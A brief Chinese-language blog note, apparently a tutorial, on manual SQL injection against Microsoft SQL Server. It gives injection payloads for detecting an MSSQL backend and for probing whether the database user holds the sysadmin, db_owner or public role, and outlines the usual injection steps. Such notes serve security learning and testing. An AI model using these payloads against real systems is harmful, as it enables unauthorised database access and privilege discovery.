Microsoft SQL Server手注

时间：2021-04-21 10:30:46 阅读：20 评论：0 收藏：0 [点我收藏+]

与mysql主要不同是在语法
判断是否为Mssql数据库
and exists(select * from sysobjects) --
判断权限

and 1=(select is_srvrolemember(‘sysadmin‘)) //sa权限：数据库操作，?件管理，命令执?，注册表读取等 system
 and 1=(select is_srvrolemember(‘db_owner‘)) //db权限：?件管理,数据库操作等 users-adminstrators
 and 1=(select is_srvrolemember(‘public‘)) //public权限：数据库操作 guest-users

注入流程基本一致
1.判断注入
2.字段长度
3.寻找字符型显位
4.查询
借鉴一篇佳作https://www.naraku.cn/posts/67.html

原文：https://www.cnblogs.com/lulu-3214536072/p/14683526.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)